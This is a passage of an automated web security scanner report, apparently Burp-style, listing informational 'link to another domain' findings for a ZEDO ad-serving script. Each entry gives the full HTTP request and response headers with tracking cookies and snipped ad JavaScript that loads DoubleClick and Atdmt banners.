Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=31:31:30:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=31:31:31:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=78
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:03 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=31%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=31%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.195. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.14527854325225092 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=39:42:39:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=40:39:42:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:43 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=40%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=40%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.196. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.38075290570136455 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,21; FFad=0:0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133|0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:06 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:06 GMT
Connection: close
Content-Length: 2672

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=1%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=1%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.197. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.02278318195768897 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=46:41:42:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=42:46:42:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:51 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=42%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=42%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.198. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.41092619470046715 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=35:36:35:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=36:35:36:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:26 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=36%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=36%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.199. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.483123755400549 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=29:27:28:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:51 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=29:29:27:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=90
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:51 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5286815.2;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=29%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=29%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5286815.2;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=29%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=29%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.200. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7971346554758543 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=17:18:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=18:18:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=124
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:17 GMT
Connection: close
Content-Length: 2123

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=18%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=18%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.201. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.1735954301565018 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=11:10:12:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:48 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:11:10:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:48 GMT
Connection: close
Content-Length: 2109

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.32;sz=160x600;click=http://yads.zedo.com/ads2/c?a=929080%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=13%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=13%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.202. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9605442887666107 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=49:48:53:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=50:48:53:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=104
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:10 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=50%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=50%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.203. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6042884822964301 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFad=3:6:5:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:1,1,1:1,1,1:0,1,1:2,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|2,1,1:1,1,1:1,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:33 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:3:6:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=228
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:33 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=6%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=6%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
